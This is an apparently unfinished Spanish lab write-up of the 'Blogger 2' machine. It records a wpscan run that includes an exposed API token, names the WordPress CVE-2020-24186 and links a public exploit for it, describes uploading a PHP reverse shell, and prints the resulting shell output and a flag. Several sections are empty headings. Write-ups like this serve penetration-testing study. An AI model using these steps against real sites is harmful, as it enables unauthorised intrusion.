Ir al contenido

Pablo López

Contrátame
Contrátame

Pablo López

Contrátame
Contrátame

Writeups

1
  • Blogger 1

Investigaciones

1
  • Blogger 2
View Categories
  • Inicio
  • Documentación
  • Investigaciones
  • Blogger 2

Blogger 2

1 minutos de lectura

Objetivos #

Objetivo 1 – #

Service enumeration #

Nmap port #

Nmap services #

Reconnaissance #

Initial access #

Encontramos un wordpress en la dirección http://192.168.156.217/assets/fonts/blog/ Tras verificar la existencia de WordPress utilizamos WPSCAN para analizar el objetivo

wpscan --url <http://192.168.156.217/assets/fonts/blog/> --enumerate vp,u,vt,tt --plugins-detection mixed --api-token sjzLSkbHSuUKjAOg4Ub1y7WE9HEqdBGyifG2iOJFaBI

Entre las vulnerabilidades, vemos la siguiente:

Para explotar la vulnerabilidad, seguimos el siguiente tutorial

URL de Incrustado

Pega un enlace al contenido que quieras mostrar en tu sitio.URL de IncrustadoIncrustar

Aprende más sobre los incrustados↗

Lo siento, este contenido no se puede incrustar.Probar de nuevoConvertir a enlace

Y lo hacemos de forma manual con el exploit

https://github.com/substing/CVE-2020-24186_reverse_shell_upload/blob/main/exploit.py
image.png

Subimos una reverse shell de php y la ejecutamos consiguiendo acceso una shell interactiva

whoami && ipconfig && local.txt #

www-data@ubuntu-xenial:/home/james$ whoami;ifconfig;cat local.txt
www-data
ens160 Link encap:Ethernet HWaddr 00:50:56:9e:0d:1d
inet addr:192.168.156.217 Bcast:192.168.156.255 Mask:255.255.255.0
inet6 addr: fe80::250:56ff:fe9e:d1d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:22855 errors:0 dropped:245 overruns:0 frame:0
TX packets:18050 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:12294502 (12.2 MB) TX bytes:4938675 (4.9 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:352 errors:0 dropped:0 overruns:0 frame:0
TX packets:352 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:30972 (30.9 KB) TX bytes:30972 (30.9 KB)

a1b48cd0b5a9b9e0a9369892a068ffd8



Privilage escalation #

whoami && ipconfig && proof.txt #

Updated on febrero 11, 2026

What are your Feelings

Blogger 2Blogger 2

Funciona con BetterDocs

Tabla de contenidos
  • Objetivos
    • Objetivo 1 -
    • Service enumeration
    • Nmap port
    • Nmap services
    • Reconnaissance
    • Initial access
    • whoami && ipconfig && local.txt
    • Privilage escalation
    • whoami && ipconfig && proof.txt
Email

pablolopez@gmail.com

Copyright © 2026 Powered by rinku.tech